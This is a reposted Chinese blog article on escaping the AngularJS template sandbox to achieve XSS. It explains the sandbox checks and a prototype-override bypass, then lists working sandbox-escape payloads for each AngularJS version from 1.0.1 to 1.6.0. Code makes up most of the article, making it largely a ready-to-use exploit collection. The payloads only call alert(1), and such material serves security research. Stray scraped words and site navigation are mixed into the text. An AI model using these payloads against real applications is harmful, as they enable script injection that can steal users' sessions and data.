AngularJs 动态模板真的安全吗?尝试一下XSS攻击。
前情提要
angularJs经过“{{}}”来做为输出的标志,而对于双括号里面的内容angularJs会计计算并输出结果,咱们能够在里面输入JS代码,而且一些语句还能获得执行,这使得咱们的XSS有了可能,虽然不能直接写函数表达式,但这并难不住咱们的白帽。express
沙箱检验
angularJs会对表达式进行重写,并过滤计算输出,好比咱们输入bash
{{1 + 1}}
复制代码
在JS中会被转换成app
"use strict";
var fn = function(s, l, a, i) {
return plus(1, 1);
};
return fn;
复制代码
return fn;这里的返回会被angualrJs执行,angularJs改写这个方法后转换是这样的async
"use strict";
var fn = function(s, l, a, i) {
var v0, v1, v2, v3, v4 = l && ('constructor' in l),
v5;
if (!(v4)) {
if (s) {
v3 = s.constructor;
}
} else {
v3 = l.constructor;
}
ensureSafeObject(v3, text);
if (v3 != null) {
v2 = ensureSafeObject(v3.constructor, text);
} else {
v2 = undefined;
}
if (v2 != null) {
ensureSafeFunction(v2, text);
v5 = 'alert\u00281\u0029';
ensureSafeObject(v3, text);
v1 = ensureSafeObject(v3.constructor(ensureSafeObject('alert\u00281\u0029', text)), text);
} else {
v1 = undefined;
}
if (v1 != null) {
ensureSafeFunction(v1, text);
v0 = ensureSafeObject(v1(), text);
} else {
v0 = undefined;
}
return v0;
};
return fn;
复制代码
angularJs会检查每个输入的参数,ensureSafeObject方法会检验出函数的构造方法,窗口对象,对象,或者对象的构造方法,任意的其中一项被检查出来,表达式都不会执行.angularJs还有ensureSafeMemeberName和ensureSafeFunction来过滤掉方法原型链方法和检查这个指向。ide
如何逃逸
怎么样能逃过模板的过滤呢,可让咱们输入的模板被角执行,由于angularJs不支持函数输入,咱们不能够直接覆盖本地的JS函数。但在字符串对象中找到了漏洞,fromCharCode,则charCode, charAt,因为没有重写这些方法,经过改变本地的js函数,我能够在angularJs调用这些方法的时候为本身开一个后门,将我改写的来覆盖原来的函数。函数
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
复制代码
formCharCode方法执行的时候内部的this指向的是String对象,经过上面的可指执行语句,咱们能够对fromCharCode 函数进行覆盖,当在本页面内执行时,好比:ui
onload=function(){
document.write(String.fromCharCode(97));//会弹出 /Backdoored/
}
复制代码
还能够这样this
'a'.constructor.prototype.charCodeAt=[].concat
复制代码
当angularJs调用charCodeAt函数时,个人代码就被执行到angular源码去了,好比说在这段里面有encodeEntities 方法用来对属性和名称作一个过滤而后输出,spa
if (validAttrs[lkey] === true && (uriAttrs[lkey] !== true || uriValidator(value, isImage))) {
out(' ');
out(key);
out('="');
out(encodeEntities(value));//找的就是encodeEntities
out('"');
}
复制代码
具体的encodeEntities代码以下:prototype
function encodeEntities(value) {
return value.
replace(/&/g, '&').
replace(SURROGATE_PAIR_REGEXP, function(value) {
var hi = value.charCodeAt(0);
var low = value.charCodeAt(1);
return '&#' + (((hi - 0xD800) * 0x400) + (low - 0xDC00) + 0x10000) + ';';
}).
replace(NON_ALPHANUMERIC_REGEXP, function(value) {
return '&#' + value.charCodeAt(0) + ';';//这里发生了很差事情,我改写了这个方法,能够植入一些恶意代码,而且获得返回输出 }).
replace(/</g, '<').
replace(/>/g, '>');
}
复制代码
具体执行
//这是输入代码
{{
'a'.constructor.prototype.charAt=[].join;
$eval('x=""')+''
}}
//这是被覆盖影响的代码
"use strict";
var fn = function(s, l, a, i) {
var v5, v6 = l && ('x\u003d\u0022\u0022' in l);//被影响的
if (!(v6)) {
if (s) {
v5 = s.x = "";//被影响的
}
} else {
v5 = l.x = "";//被影响的
}
return v5;
};
fn.assign = function(s, v, l) {
var v0, v1, v2, v3, v4 = l && ('x\u003d\u0022\u0022' in l);//被影响的
v3 = v4 ? l : s;
if (!(v4)) {
if (s) {
v2 = s.x = "";//被影响的
}
} else {
v2 = l.x = "";//被影响的
}
if (v3 != null) {
v1 = v;
ensureSafeObject(v3.x = "", text);//被影响的
v0 = v3.x = "" = v1;//被影响的
}
return v0;
};
return fn;
复制代码
{{
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)')+'' //注入了alert(1)
}}
"use strict";
var fn = function(s, l, a, i) {
var v5, v6 = l && ('x\u003dalert\u00281\u0029' in l);
if (!(v6)) {
if (s) {
v5 = s.x = alert(1);
}
} else {
v5 = l.x = alert(1);
}
return v5;
};
fn.assign = function(s, v, l) {
var v0, v1, v2, v3, v4 = l && ('x\u003dalert\u00281\u0029' in l);
v3 = v4 ? l : s;
if (!(v4)) {
if (s) {
v2 = s.x = alert(1);
}
} else {
v2 = l.x = alert(1);
}
if (v3 != null) {
v1 = v;
ensureSafeObject(v3.x = alert(1), text);
v0 = v3.x = alert(1) = v1;
}
return v0;
};
return fn;
复制代码
下面附上一些代码,能够直接结合angularJs验证
不一样版本的实现代码以及发现者:
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
复制代码
1.2.0 - 1.2.1 Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
复制代码
1.2.2 - 1.2.5 Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
复制代码
1.2.6 - 1.2.18 Jan Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
复制代码
1.2.19 - 1.2.23 Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
复制代码
1.2.24 - 1.2.29 Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
复制代码
1.3.0 Gábor Molnár (Google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
复制代码
1.3.1 - 1.3.2 Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
复制代码
1.3.3 - 1.3.18 Gareth Heyes (PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
复制代码
1.3.19 Gareth Heyes (PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
复制代码
1.3.20 Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
复制代码
1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
复制代码
1.5.0 - 1.5.8 Ian Hickey
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
复制代码
1.5.9 - 1.5.11 Jan Horn (Google)
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; ");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
复制代码
= 1.6.0 Mario Heiderich(Cure53)
{{constructor.constructor('alert(1)')()}}
复制代码
转自:https://pockr.org/activity/detail?activity_no=act_017d460d4e5988dad2
相关文章
- 1. 前端安全 -- XSS攻击
- 2. web安全(xss攻击和csrf攻击)
- 3. 安全性测试之XSS攻击
- 4. web安全测试之 xss攻击
- 5. web安全三,XSS攻击
- 6. Web安全之XSS攻击
- 7. Web安全-XSS攻击demo
- 8. Xss攻击测试
- 9. Python全栈(五)Web安全攻防之9.XSS攻击(下)
- 10. 前端安全之XSS攻击
- 更多相关文章...
- • Maven 项目模板 - Maven教程
- • Eclipse 代码模板 - Eclipse 教程
- • 委托模式
- • Docker容器实战(七) - 容器眼光下的文件系统
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 融合阿里云,牛客助您找到心仪好工作
- 2. 解决jdbc(jdbctemplate)在测试类时不报错在TomCatb部署后报错
- 3. 解决PyCharm GoLand IntelliJ 等 JetBrains 系列 IDE无法输入中文
- 4. vue+ant design中关于图片请求不显示的问题。
- 5. insufficient memory && Native memory allocation (malloc) failed
- 6. 解决IDEA用Maven创建的Web工程不能创建Java Class文件的问题
- 7. [已解决] Error: Cannot download ‘https://start.spring.io/starter.zip?
- 8. 在idea让java文件夹正常使用
- 9. Eclipse启动提示“subversive connector discovery”
- 10. 帅某-技巧-快速转帖博主文章(article_content)
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 前端安全 -- XSS攻击
- 2. web安全(xss攻击和csrf攻击)
- 3. 安全性测试之XSS攻击
- 4. web安全测试之 xss攻击
- 5. web安全三,XSS攻击
- 6. Web安全之XSS攻击
- 7. Web安全-XSS攻击demo
- 8. Xss攻击测试
- 9. Python全栈(五)Web安全攻防之9.XSS攻击(下)
- 10. 前端安全之XSS攻击